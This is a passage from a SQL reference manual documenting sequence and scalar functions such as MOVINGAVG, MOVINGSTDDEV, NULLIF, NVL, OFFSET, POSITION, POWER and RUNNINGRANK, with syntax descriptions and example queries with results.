\r\n<<<\r\n[[examples_of_movingavg]]\r\n=== Examples of MOVINGAVG\r\n\r\n* Return the average of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nCREATE TABLE db.mining.seqfcn (I1 INTEGER, ts TIMESTAMP);\r\n\r\nSELECT MOVINGAVG (I1,3) AS MOVINGAVG3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nI1 TS\r\n6215 TIMESTAMP '1950-03-05 08:32:09'\r\n28174 TIMESTAMP '1951-02-15 14:35:49'\r\nnull TIMESTAMP '1955-05-18 08:40:10'\r\n4597 TIMESTAMP '1960-09-19 14:40:39'\r\n11966 TIMESTAMP '1964-05-01 16:41:02'\r\n\r\nMOVINGAVG3\r\n---------------------\r\n 6215\r\n 17194\r\n 17194\r\n 16385\r\n 8281\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingcount_function]]\r\n== MOVINGCOUNT Function\r\n\r\nThe MOVINGCOUNT function is a sequence function that returns the number\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGCOUNT (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGCOUNT returns the same result as\r\nRUNNINGCOUNT:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified.
You\r\ncannot specify DISTINCT for the MOVINGCOUNT sequence function; duplicate\r\nvalues are counted.\r\n\r\n[[examples_of_movingcount]]\r\n=== Examples of MOVINGCOUNT\r\n\r\n* Return the number of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGCOUNT (I1,3) AS MOVINGCOUNT3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGCOUNT3\r\n------------\r\n 1\r\n 2\r\n 2\r\n 2\r\n 2\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmax_function]]\r\n== MOVINGMAX Function\r\n\r\nThe MOVINGMAX function is a sequence function that returns the maximum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMAX (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMAX returns the same result as\r\nRUNNINGMAX:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmax]]\r\n=== Examples of MOVINGMAX\r\n\r\n* Return the maximum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMAX (I1,3) AS MOVINGMAX3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMAX3\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmin_function]]\r\n== MOVINGMIN Function\r\n\r\nThe MOVINGMIN function is a sequence function that returns the minimum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMIN (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. 
The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMIN returns the same result as\r\nRUNNINGMIN:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmin]]\r\n=== Examples of MOVINGMIN\r\n\r\n* Return the minimum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMIN (I1,3) AS MOVINGMIN3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMIN3\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingstddev_function]]\r\n== MOVINGSTDDEV Function\r\n\r\nThe MOVINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column in the current window\r\nof an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSTDDEV (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSTDDEV returns the same result as\r\nRUNNINGSTDDEV:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. 
This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingstddev]]\r\n=== Examples of MOVINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of a column in the\r\ncurrent window of three rows:\r\n+\r\n```\r\nSELECT MOVINGSTDDEV (I1,3) AS MOVINGSTDDEV3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSTDDEV3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.51150124820766640E+004\r\n 6.03627542446499008E+003\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGSTDDEV (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 15527.357\r\n 14802.016\r\n 15115.012\r\n 6036.275\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingsum_function]]\r\n== MOVINGSUM Function\r\n\r\nThe MOVINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSUM (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSUM returns the same result as\r\nRUNNINGSUM:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. 
This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingsum]]\r\n=== Examples of MOVINGSUM\r\n\r\n* Return the sum of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGSUM (I1,3) AS MOVINGSUM3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSUM3\r\n------------\r\n 6215\r\n 34389\r\n 34389\r\n 32771\r\n 16563\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingvariance_function]]\r\n== MOVINGVARIANCE Function\r\n\r\nThe MOVINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column in the current window of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGVARIANCE (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGVARIANCE returns the same result as\r\nRUNNINGVARIANCE:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingvariance]]\r\n=== Examples of MOVINGVARIANCE\r\n\r\n* Return the variance of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGVARIANCE (I1,3) AS MOVINGVARIANCE3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGVARIANCE3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 2.28463602333333304E+008\r\n 3.64366210000000016E+007\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. 
For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGVARIANCE (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 228463602.333\r\n 36436621.000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[nullif_function]]\r\n== NULLIF Function\r\n\r\nThe NULLIF function compares the value of two expressions. Both\r\nexpressions must be of comparable types. The return value is NULL when\r\nthe two expressions are equal. Otherwise, the return value\r\nis the value of the first expression.\r\n\r\n```\r\nNULLIF(expr1, expr2)\r\n```\r\n\r\n* `_expr1_`\r\n+\r\nis an expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nis an expression to be compared.\r\n\r\nNULLIF(_expr1_, _expr2_) is equivalent to:\r\n\r\n```\r\nCASE\r\n WHEN expr1 = expr2 THEN NULL\r\n ELSE expr1\r\nEND\r\n```\r\n\r\nNULLIF returns NULL if both arguments are equal. The return value is\r\nthe value of the first argument when the two expressions are not equal.\r\n\r\n[[examples_of_nullif]]\r\n=== Examples of NULLIF\r\n\r\n* This function returns NULL if _value_ is equal to 7. The return\r\nvalue is the value of the first argument when that value is not 7.\r\n+\r\n```\r\nNULLIF(value,7)\r\n```
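\r\n* A usage sketch (not from the original manual; it assumes a hypothetical REVIEWS table that encodes 'not rated' as 0 in its RATING column): because aggregate functions eliminate NULL, NULLIF can exclude the sentinel value from an average:\r\n+\r\n```\r\n-- hypothetical table and column; rows with rating = 0 are ignored\r\nSELECT AVG(NULLIF(rating, 0)) FROM reviews;\r\n```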
\r\n<<<\r\n[[nullifzero_function]]\r\n== NULLIFZERO Function\r\n\r\nThe NULLIFZERO function returns the value of the expression if that\r\nvalue is not zero. It returns NULL if the value of the expression is\r\nzero.\r\n\r\n```\r\nNULLIFZERO (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n\r\n<<<\r\n[[examples_of_nullifzero]]\r\n=== Examples of NULLIFZERO\r\n\r\n* This function returns the value of the column named salary for each\r\nrow where the column's value is not zero. It returns a NULL for each row\r\nwhere the column's value is zero.\r\n+\r\n```\r\nSELECT NULLIFZERO(salary) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of 1 for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(1) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of NULL for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(0) FROM employee_tab;\r\n```\r\n\r\n<<<\r\n[[nvl_function]]\r\n== NVL Function\r\n\r\nThe NVL function determines if the selected column has a null value and\r\nthen returns the new-operand value; otherwise the operand value is\r\nreturned.\r\n\r\n```\r\nNVL (operand, new-operand)\r\n```\r\n\r\n* `_operand_`\r\n+\r\nspecifies a value expression.\r\n\r\n* `_new-operand_`\r\n+\r\nspecifies a value expression. _operand_ and _new-operand_ must be\r\ncomparable data types.\r\n\r\nIf _operand_ is a null value, NVL returns _new-operand_. If _operand_\r\nis not a null value, NVL returns _operand_.\r\n\r\nThe _operand_ and _new-operand_ can be a column name, subquery,\r\n{project-name} SQL string functions, math functions, or constant values.\r\n\r\n[[examples_of_nvl]]\r\n=== Examples of NVL\r\n\r\n* This function returns a value of z:\r\n+\r\n```\r\nSELECT NVL(CAST(NULL AS CHAR(1)), 'z') FROM (VALUES(1)) x(a);\r\n\r\n(EXPR)\r\n------\r\n\"z\"\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 1:\r\n+\r\n```\r\nSELECT NVL(1, 2) FROM (VALUES(0)) x(a);\r\n\r\n(EXPR)\r\n-------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 9999999 for the null value in the\r\ncolumn named a1:\r\n+\r\n```\r\nSELECT NVL(a1, 9999999) from t1;\r\n\r\n(EXPR)\r\n-------\r\n 123\r\n 34\r\n9999999\r\n\r\n--- 3 row(s) selected.\r\n\r\nselect * from t1;\r\n\r\nA1\r\n-------\r\n 123\r\n 34\r\n ?\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[octet_length_function]]\r\n== OCTET_LENGTH Function\r\n\r\nThe OCTET_LENGTH function returns the length of a character string in\r\nbytes.\r\n\r\n```\r\nOCTET_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\nbytes. {project-name} SQL returns the result as a 2-byte signed integer with\r\na scale of zero. If _string-value-expression_ is null, {project-name} SQL returns\r\na length of zero.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_octet_length]]\r\n=== Considerations for OCTET_LENGTH\r\n\r\n[[char_and_varchar_operands_1]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the length of\r\nthat column as the maximum number of storage bytes. For a VARCHAR\r\ncolumn, {project-name} SQL returns the length of the string stored in that\r\ncolumn as the actual number of storage bytes.\r\n\r\n[[similarity_to_char_length_function]]\r\n==== Similarity to CHAR_LENGTH Function\r\n\r\nThe OCTET_LENGTH and CHAR_LENGTH functions are similar. The OCTET_LENGTH\r\nfunction returns the number of bytes, rather than the number of\r\ncharacters, in the string. This distinction is important for multi-byte\r\nimplementations. For an example of selecting a double-byte column, see\r\n<<examples_of_octet_length,Examples of OCTET_LENGTH>>.\r\n\r\n[[examples_of_octet_length]]\r\n=== Examples of OCTET_LENGTH\r\n\r\n* If a character string is stored as two bytes for each character, this\r\nfunction returns the value 12. Otherwise, the function returns 6:\r\n+\r\n```\r\nOCTET_LENGTH ('Robert')\r\n```
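\r\n* A contrast sketch (not from the original manual; it assumes a hypothetical CUSTOMER table with a UTF8 NAME column): selecting both length functions side by side shows characters versus bytes:\r\n+\r\n```\r\n-- hypothetical table and column; the two results differ whenever\r\n-- name contains multi-byte characters\r\nSELECT CHAR_LENGTH(name), OCTET_LENGTH(name) FROM customer;\r\n```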
\r\n<<<\r\n[[offset_function]]\r\n== OFFSET Function\r\n\r\nThe OFFSET function is a sequence function that retrieves columns from\r\nprevious rows of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nOFFSET is a {project-name} SQL extension.\r\n\r\n```\r\nOFFSET ( column-expression , number-rows [, max-rows ])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_number-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the offset as the number of rows from the current\r\nrow. If the number of rows exceeds _max-rows_, OFFSET returns\r\nOFFSET(_column-expression_,_max-rows_). If the number of rows is out\r\nof range and _max-rows_ is not specified or is out of range, OFFSET\r\nreturns null. The number of rows is out of range if it is larger than\r\nthe size of the result table, negative, or NULL.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows of the offset.\r\n\r\n[[examples_of_offset]]\r\n=== Examples of OFFSET\r\n\r\n* Retrieve the I1 column offset by three rows:\r\n+\r\n```\r\nSELECT OFFSET(I1,3) AS offset3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\noffset3\r\n------------\r\n ?\r\n ?\r\n ?\r\n 6215\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first three rows retrieved display null because the offset from the\r\ncurrent row does not fall within the result table.\r\n\r\n<<<\r\n[[pi_function]]\r\n== PI Function\r\n\r\nThe PI function returns the constant value of pi as a floating-point\r\nvalue.\r\n\r\nPI is a {project-name} SQL extension.\r\n\r\n```\r\nPI()\r\n```\r\n\r\n[[examples_of_pi]]\r\n=== Examples of PI\r\n\r\n* This constant function returns the value 3.14159260000000000E+000:\r\n+\r\n```\r\nPI()\r\n```\r\n\r\n<<<\r\n[[position_function]]\r\n== POSITION Function\r\n\r\nThe POSITION function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the POSITION function is equal to the result returned by the\r\n<<locate_function,LOCATE Function>>.\r\n\r\n```\r\nPOSITION (substring-expression IN source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nThe _source-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If _substring-expression_ is not found in _source-expression_,\r\n{project-name} SQL returns zero.\r\n\r\n[[considerations_for_position]]\r\n=== Considerations for POSITION\r\n\r\n[[result_of_position]]\r\n==== Result of POSITION\r\n\r\nIf the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0. If\r\nthe length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n\r\nIf the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns zero. If\r\n_source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_the_upshift_function]]\r\n==== Using the UPSHIFT Function\r\n\r\nTo ignore case in the search, use the UPSHIFT function (or the LOWER\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_position]]\r\n=== Examples of POSITION\r\n\r\n* This function returns the value 8 for the position of the substring\r\n'John' within the string:\r\n+\r\n```\r\nPOSITION ('John' IN 'Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names.
Return all records in table EMPLOYEE that\r\ncontain the substring 'Smith' regardless of whether the column value is\r\nin uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE POSITION ('SMITH' IN UPSHIFT(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[power_function]]\r\n== POWER Function\r\n\r\nThe POWER function returns the value of a numeric value expression\r\nraised to the power of an integer value expression. You can also use the\r\nexponential operator \\*\\*.\r\n\r\nPOWER is a {project-name} SQL extension.\r\n\r\n```\r\nPOWER (numeric-expression-1, numeric-expression-2)\r\n```\r\n\r\n* `_numeric-expression-1_, _numeric-expression-2_`\r\n+\r\nare SQL numeric value expressions that specify the values for the base\r\nand exponent arguments of the POWER function. See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n+\r\nIf the base _numeric-expression-1_ is zero, the exponent _numeric-expression-2_\r\nmust be greater than zero, and the result is zero. If the exponent is zero,\r\nthe base cannot be 0, and the result is 1. If the base is negative, the\r\nexponent must be a value with an exact numeric data type and a scale of zero.\r\n\r\n[[examples_of_power]]\r\n=== Examples of POWER\r\n\r\n* Return the value 15.625:\r\n+\r\n```\r\nPOWER (2.5,3)\r\n```\r\n\r\n* Return the value 27. The function POWER raised to the power of 2 is\r\nthe inverse of the function SQRT:\r\n+\r\n```\r\nPOWER (SQRT(27),2)\r\n```\r\n\r\n<<<\r\n[[quarter_function]]\r\n== QUARTER Function\r\n\r\nThe QUARTER function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 4 that represents the corresponding\r\nquarter of the year. Quarter 1 represents January 1 through March 31,\r\nand so on.\r\n\r\nQUARTER is a {project-name} SQL extension.\r\n\r\n```\r\nQUARTER (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_quarter]]\r\n=== Examples of QUARTER\r\n\r\n* Return an integer that represents the quarter of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, QUARTER(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2\r\n```\r\n\r\n<<<\r\n[[radians_function]]\r\n== RADIANS Function\r\n\r\nThe RADIANS function converts a numeric value expression (expressed in\r\ndegrees) to the number of radians.\r\n\r\nRADIANS is a {project-name} SQL extension.\r\n\r\n```\r\nRADIANS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the RADIANS function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_radians]]\r\n=== Examples of RADIANS\r\n\r\n* Return the value 7.85398150000000000E-001, or approximately 0.7854 radians,\r\nwhich corresponds to 45 degrees:\r\n+\r\n```\r\nRADIANS (45)\r\n```\r\n\r\n* Return the value 45 in degrees. The function DEGREES is the inverse of\r\nthe function RADIANS.\r\n+\r\n```\r\nDEGREES (RADIANS (45))\r\n```\r\n\r\n<<<\r\n[[runningrank_function]]\r\n== RANK\/RUNNINGRANK Function\r\n\r\nThe RANK\/RUNNINGRANK function is a sequence function that returns the\r\nrank of the given value of an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement.
RANK is an alternative syntax\r\nfor RUNNINGRANK.\r\n\r\nRANK\/RUNNINGRANK is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGRANK(expression) | RANK(expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies the expression on which to perform the rank.\r\n\r\nRANK\/RUNNINGRANK returns the rank of the expression within the\r\nintermediate result table. The definition of rank is as follows:\r\n\r\n```\r\nRANK = 1 for the first value of the intermediate result table.\r\n\r\n= the previous value of RANK if the previous value of expression is\r\nthe same as the current value of expression.\r\n\r\n= RUNNINGCOUNT(*) otherwise.\r\n```\r\n\r\nIn other words, RANK starts at 1. Values that are equal have the same\r\nrank. The value of RANK advances to the relative position of the row in\r\nthe intermediate result when the value changes.\r\n\r\n[[considerations_for_runningrank]]\r\n=== Considerations for RANK\/RUNNINGRANK\r\n\r\n[[sequence_order_dependency]]\r\n==== Sequence Order Dependency\r\n\r\nThe RUNNINGRANK function is meaningful only when the given expression is\r\nthe leading column of the SEQUENCE BY clause. This is because the\r\nRUNNINGRANK function assumes that the values of expression are in order\r\nand that like values are contiguous. If an ascending order is specified\r\nfor expression in the SEQUENCE BY clause, then the RUNNINGRANK function\r\nassigns a rank of 1 to the lowest value of expression. If a descending\r\norder is specified for expression in the SEQUENCE BY clause, then the\r\nRUNNINGRANK function assigns a rank of 1 to the highest value of\r\nexpression.\r\n\r\n[[runningrank_null_values]]\r\n==== NULL Values\r\n\r\nFor the purposes of RUNNINGRANK, NULL values are considered to be equal.\r\n\r\n[[examples_of_runningrank]]\r\n=== Examples of RANK\/RUNNINGRANK\r\n\r\n* Suppose that _seqfcn_ has been created as:\r\n+\r\n```\r\nCREATE TABLE cat.sch.seqfcn (i1 INTEGER, i2 INTEGER);\r\n```\r\n+\r\nThe table SEQFCN has columns _i1_ and _i2_ with data:\r\n+\r\n[cols=\"15%,85%\",options=\"header\"]\r\n|===\r\n| i1 | i2\r\n| 1 | 100\r\n| 2 | 100\r\n| 3 | 200\r\n| 4 | 200\r\n| 5 | 200\r\n| 6 | 300\r\n| 8 | null\r\n| 10 | null\r\n|===\r\n\r\n* Return the rank of _i1_:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK(i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 1 1\r\n 2 2\r\n 3 3\r\n 4 4\r\n 5 5\r\n 6 6\r\n 8 7\r\n 10 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Return the rank of _i1_ descending:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK (i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1 DESC;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 10 1\r\n 8 2\r\n 6 3\r\n 5 4\r\n 4 5\r\n 3 6\r\n 2 7\r\n 1 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of 